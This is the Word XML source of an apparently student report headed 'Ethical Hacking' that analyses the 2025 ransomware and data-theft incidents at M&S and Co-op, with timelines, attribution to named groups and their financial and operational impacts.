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B1E60" w14:textId="46F4340F" w:rsidR="0061565C" w:rsidRPr="009C7E49" w:rsidRDefault="004970D4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C7E49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                    ETHICAL HACKING </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0F7A38" w14:textId="77777777" w:rsidR="004970D4" w:rsidRDefault="004970D4"/>
    <w:p w14:paraId="693D1316" w14:textId="0462353E" w:rsidR="004970D4" w:rsidRDefault="004970D4">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125952E3" w14:textId="00CFEC9B" w:rsidR="004115EF" w:rsidRPr="004115EF" w:rsidRDefault="004115EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004115EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>INTRODUCTION:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6337EC36" w14:textId="77777777" w:rsidR="00D31F6D" w:rsidRDefault="00D31F6D" w:rsidP="00D31F6D">
      <w:r>
        <w:t>UK retailers have increasingly become prime targets for cybercriminals, owing to their extensive customer bases, intricate supply chains, and reliance on digital platforms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56419E06" w14:textId="63C055A8" w:rsidR="00D31F6D" w:rsidRDefault="00D31F6D" w:rsidP="00D31F6D">
      <w:r>
        <w:t>Recent incidents involving M&amp;S and Co-op illustrate how contemporary ransomware and data theft operations can simultaneously disrupt business operations, erode brand trust, and lead to significant financial repercussions. M&amp;S reportedly experienced a significant cyberattack that incapacitated its online services for several weeks, with estimated losses of £300 to £400 million, linked to the Scattered Spider group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CBAA19" w14:textId="77777777" w:rsidR="00D31F6D" w:rsidRDefault="00D31F6D" w:rsidP="00D31F6D">
      <w:r>
        <w:t>Similarly, Co-op reported a serious cyber incident that necessitated the shutdown of IT systems, led to empty shelves, and resulted in an £80 million impact on profits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260DAE2E" w14:textId="1F473113" w:rsidR="00B25530" w:rsidRDefault="00D31F6D" w:rsidP="00D31F6D">
      <w:r>
        <w:t xml:space="preserve">While attribution points to different named groups (such as Scattered Spider and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DragonForce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>), the incidents exhibit common characteristics: ransomware-style extortion, data exfiltration, disruption of both online and in-store operations, and the exploitation of identity and third-party vulnerabilities. This report examines these incidents as part of a larger campaign targeting UK retail, while also highlighting their specific differences.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373104D7" w14:textId="77777777" w:rsidR="00912A8C" w:rsidRDefault="00912A8C" w:rsidP="00D31F6D"/>
    <w:p w14:paraId="2B38F597" w14:textId="10B2E465" w:rsidR="00912A8C" w:rsidRPr="008F1945" w:rsidRDefault="00912A8C" w:rsidP="00D31F6D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F1945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scope of the work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B18A95B" w14:textId="77777777" w:rsidR="00554662" w:rsidRDefault="00554662" w:rsidP="00D31F6D"/>
    <w:p w14:paraId="017319E8" w14:textId="77777777" w:rsidR="00F82B7B" w:rsidRDefault="00F82B7B" w:rsidP="00F82B7B">
      <w:r>
        <w:t>This report focuses on analysing the cyberattacks on M&amp;S and Co</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t>op as case studies within a wider trend of escalating cyber threats against UK retail organisations. The scope includes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B57F32" w14:textId="77777777" w:rsidR="00F82B7B" w:rsidRDefault="00F82B7B" w:rsidP="00F82B7B"/>
    <w:p w14:paraId="10C18382" w14:textId="77777777" w:rsidR="00F82B7B" w:rsidRDefault="00F82B7B" w:rsidP="00F82B7B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Examination of the nature and impact of each attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F87FF6A" w14:textId="77777777" w:rsidR="00F82B7B" w:rsidRDefault="00F82B7B" w:rsidP="00F82B7B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Comparison of attack vectors, threat actors, and operational consequences</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1633DD2B" w14:textId="77777777" w:rsidR="00F82B7B" w:rsidRDefault="00F82B7B" w:rsidP="00F82B7B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Identification of common vulnerabilities exploited across the sector</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1904C677" w14:textId="77777777" w:rsidR="00F82B7B" w:rsidRDefault="00F82B7B" w:rsidP="00F82B7B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Assessment of financial, operational, and reputational impacts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCDB2BE" w14:textId="77777777" w:rsidR="00F82B7B" w:rsidRDefault="00F82B7B" w:rsidP="00F82B7B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Discussion of broader implications for UK retail cybersecurity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1124CB16" w14:textId="593BF0D9" w:rsidR="00554662" w:rsidRDefault="00F82B7B" w:rsidP="00F82B7B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Recommendations for strengthening resilience and mitigating future risks</w:t>
      </w:r>
      <w:r w:rsidR="00B43DD5">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AE2F26" w14:textId="77777777" w:rsidR="00D31F6D" w:rsidRDefault="00D31F6D" w:rsidP="004970D4"/>
    <w:p w14:paraId="6FEB2762" w14:textId="77777777" w:rsidR="00D31F6D" w:rsidRDefault="00D31F6D" w:rsidP="004970D4"/>
    <w:p w14:paraId="24E01FBD" w14:textId="77777777" w:rsidR="00D31F6D" w:rsidRDefault="00D31F6D" w:rsidP="004970D4"/>
    <w:p w14:paraId="205BBFFA" w14:textId="77777777" w:rsidR="00D31F6D" w:rsidRDefault="00D31F6D" w:rsidP="004970D4"/>
    <w:p w14:paraId="172E6507" w14:textId="77777777" w:rsidR="00D31F6D" w:rsidRDefault="00D31F6D" w:rsidP="004970D4"/>
    <w:p w14:paraId="4CB22EA3" w14:textId="77777777" w:rsidR="00D31F6D" w:rsidRDefault="00D31F6D" w:rsidP="004970D4"/>
    <w:p w14:paraId="057D61A4" w14:textId="01C8A2B3" w:rsidR="004970D4" w:rsidRPr="008F1945" w:rsidRDefault="004970D4" w:rsidP="00D95E6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F1945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Incident summary and timeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE16261" w14:textId="08D4B47D" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="00546009">
      <w:r>
        <w:t>Marks &amp; Spencer (M&amp;S</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="OLE_LINK1"/>
      <w:r w:rsidR="00546009">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Public reporting indicates that M&amp;S was hit by a major cyberattack in early 2025, with activity beginning over the Easter weekend. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FEFA32" w14:textId="77777777" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="004970D4">
      <w:r>
        <w:t>Timeline (M&amp;S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F37DD24" w14:textId="77777777" w:rsidR="00567064" w:rsidRDefault="004970D4" w:rsidP="004970D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Late March–Easter weekend 2025 – Initial compromise: attackers (linked to Scattered Spider) reportedly gained access using stolen third</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t>party credentials, bypassing MFA and entering M&amp;S systems over a holiday period when staffing was reduced</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39270306" w14:textId="77777777" w:rsidR="00567064" w:rsidRDefault="004970D4" w:rsidP="004970D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Early April 2025 – Ransomware deployment and disruption: online orders were suspended, core systems taken offline, and in</w:t>
      </w:r>
      <w:r w:rsidRPr="00567064">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">store payment issues reported. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2793E20E" w14:textId="77777777" w:rsidR="00567064" w:rsidRDefault="004970D4" w:rsidP="004970D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Mid</w:t>
      </w:r>
      <w:r w:rsidRPr="00567064">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">April 2025 </w:t>
      </w:r>
      <w:r w:rsidRPr="00567064">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Internal chaos and response: insiders described </w:t>
      </w:r>
      <w:r w:rsidRPr="00567064">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>paranoia and chaos</w:t>
      </w:r>
      <w:r w:rsidRPr="00567064">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, staff sleeping in offices, and lack of a mature incident response plan. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9EC0D2" w14:textId="77777777" w:rsidR="00E97307" w:rsidRDefault="004970D4" w:rsidP="004970D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>April–May 2025 – Extended outage: online services remained down for several weeks while systems were rebuilt; M&amp;S warned investors of a significant profit hit (c. £300m+).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D6BF15" w14:textId="77777777" w:rsidR="00E97307" w:rsidRDefault="004970D4" w:rsidP="004970D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>May–June 2025 – Public communication and investigation: CEO issued apologies; investigations with partners such as Tata Consultancy Services (TCS) confirmed that TCS systems themselves were not directly breached, though third</w:t>
      </w:r>
      <w:r w:rsidRPr="00567064">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">party credentials were implicated. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77739975" w14:textId="420437A0" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="004970D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Post</w:t>
      </w:r>
      <w:r w:rsidRPr="00E97307">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">incident </w:t>
      </w:r>
      <w:r w:rsidRPr="00E97307">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Gradual restoration of services and strengthening of security controls, including identity, monitoring, and supply</w:t>
      </w:r>
      <w:r w:rsidRPr="00E97307">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">chain security. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D32294" w14:textId="77777777" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="004970D4"/>
    <w:p w14:paraId="46E25FF5" w14:textId="6642B6FC" w:rsidR="004970D4" w:rsidRPr="00492D5F" w:rsidRDefault="004970D4" w:rsidP="004970D4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00492D5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Co</w:t>
      </w:r>
      <w:r w:rsidRPr="00492D5F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r w:rsidRPr="00492D5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>operative Group (Co</w:t>
      </w:r>
      <w:r w:rsidRPr="00492D5F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r w:rsidRPr="00492D5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>op)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75880BD3" w14:textId="77777777" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="004970D4">
      <w:r>
        <w:t>Co</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">op disclosed a serious cyber incident in 2025, with official FAQs and industry analysis describing attempted hacking, data exfiltration, and major operational disruption. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3A84FA" w14:textId="77777777" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="004970D4"/>
    <w:p w14:paraId="030C573F" w14:textId="77777777" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="004970D4">
      <w:r>
        <w:t>Timeline (Co</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t>op)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7BB912" w14:textId="77777777" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="004970D4"/>
    <w:p w14:paraId="2DC10BC9" w14:textId="77777777" w:rsidR="00492D5F" w:rsidRDefault="004970D4" w:rsidP="004970D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>April 2025 – Attempted hack detected: Co</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">op identified malicious activity and shut down parts of its IT systems to contain the incident. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150BC8E4" w14:textId="77777777" w:rsidR="00492D5F" w:rsidRDefault="004970D4" w:rsidP="004970D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Shortly after M&amp;S attack – Media noted that the Co</w:t>
      </w:r>
      <w:r w:rsidRPr="00492D5F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">op incident followed </w:t>
      </w:r>
      <w:r w:rsidRPr="00492D5F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>shortly after</w:t>
      </w:r>
      <w:r w:rsidRPr="00492D5F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the M&amp;S cyberattack, suggesting a broader campaign against UK retail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509EC4F1" w14:textId="77777777" w:rsidR="00A97F6C" w:rsidRDefault="004970D4" w:rsidP="004970D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>April–May 2025 – Operational disruption: shutdown of critical systems led to gaps on supermarket shelves and manual, paper</w:t>
      </w:r>
      <w:r w:rsidRPr="00492D5F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">based processes in funeral services. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDDF8EC" w14:textId="77777777" w:rsidR="00A97F6C" w:rsidRDefault="004970D4" w:rsidP="004970D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Mid</w:t>
      </w:r>
      <w:r w:rsidRPr="00A97F6C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2025 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A97F6C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Data breach confirmed: Co</w:t>
      </w:r>
      <w:r w:rsidRPr="00A97F6C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t>op acknowledged that attackers copied data from one of its systems; official FAQs emphasised cooperation with NCSC and NCA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541CA046" w14:textId="77777777" w:rsidR="00A97F6C" w:rsidRDefault="004970D4" w:rsidP="004970D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>September–October 2025 – Financial impact disclosed: Co</w:t>
      </w:r>
      <w:r w:rsidRPr="00A97F6C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">op reported an </w:t>
      </w:r>
      <w:r w:rsidRPr="00A97F6C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>£</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">80m hit to operating profit due to the cyberattack and associated disruption. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0863663F" w14:textId="7E81C983" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="004970D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Post</w:t>
      </w:r>
      <w:r w:rsidRPr="00A97F6C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">incident </w:t>
      </w:r>
      <w:r w:rsidRPr="00A97F6C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Strengthening of security, including tightened access controls and improved monitoring, as stated in Co</w:t>
      </w:r>
      <w:r w:rsidRPr="00A97F6C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t>op</w:t>
      </w:r>
      <w:r w:rsidRPr="00A97F6C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">s own communications. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06791BD3" w14:textId="58E91656" w:rsidR="0073300A" w:rsidRDefault="0073300A" w:rsidP="0073300A">
      <w:r>
        <w:t xml:space="preserve">Financial </w:t>
      </w:r>
      <w:r w:rsidR="00163004">
        <w:t>and operational impacts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA86855" w14:textId="77777777" w:rsidR="00380C80" w:rsidRDefault="00380C80" w:rsidP="00380C80">
      <w:r>
        <w:t xml:space="preserve">    Marks &amp; Spencer (M&amp;S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B74E89" w14:textId="77777777" w:rsidR="00380C80" w:rsidRDefault="00380C80" w:rsidP="00380C80">
      <w:r>
        <w:t>Evidence from your open tab shows that the M&amp;S attack resulted in one of the most expensive cyber incidents in UK retail history:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4CA674" w14:textId="77777777" w:rsidR="00380C80" w:rsidRDefault="00380C80" w:rsidP="00380C80"/>
    <w:p w14:paraId="46375289" w14:textId="77777777" w:rsidR="00B37E8C" w:rsidRDefault="00380C80" w:rsidP="00380C80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>£300 million projected operating profit loss for FY 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13339480" w14:textId="77777777" w:rsidR="0089452E" w:rsidRDefault="00380C80" w:rsidP="00380C80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>£15 million in weekly lost sales during the outage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4651C996" w14:textId="6FE86ED9" w:rsidR="0089452E" w:rsidRDefault="00380C80" w:rsidP="0089452E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Over £1 billion wiped from </w:t>
      </w:r>
      <w:r w:rsidR="00DD678C">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:t>market value during the disruption</w:t>
      </w:r>
      <w:r w:rsidR="0089452E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C49B651" w14:textId="77777777" w:rsidR="00DD678C" w:rsidRDefault="00DD678C" w:rsidP="00DD678C">
      <w:r>
        <w:t>Co</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t>op publicly reported that its cyber incident caused:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E40AC7" w14:textId="77777777" w:rsidR="00DD678C" w:rsidRDefault="00DD678C" w:rsidP="00DD678C"/>
    <w:p w14:paraId="78BA4753" w14:textId="77777777" w:rsidR="00DD678C" w:rsidRDefault="00DD678C" w:rsidP="00DD678C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>£80 million profit impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6738AC8A" w14:textId="77777777" w:rsidR="00DD678C" w:rsidRDefault="00DD678C" w:rsidP="00DD678C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Significant losses from store closures, empty shelves, and manual workarounds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661CCE9E" w14:textId="11CC572A" w:rsidR="00DD678C" w:rsidRDefault="00DD678C" w:rsidP="00DD678C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Additional recovery and system</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD678C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t>restoration costs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263F6A8C" w14:textId="2ECA0E66" w:rsidR="00EB08C5" w:rsidRDefault="00AA13E3" w:rsidP="00EB08C5">
      <w:r w:rsidRPr="00AA13E3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18972112" wp14:editId="1B560570">
            <wp:extent cx="5731510" cy="3494405"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1803528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528673" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3494405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DCA067" w14:textId="77777777" w:rsidR="003A1B4C" w:rsidRDefault="003A1B4C" w:rsidP="00EB08C5"/>
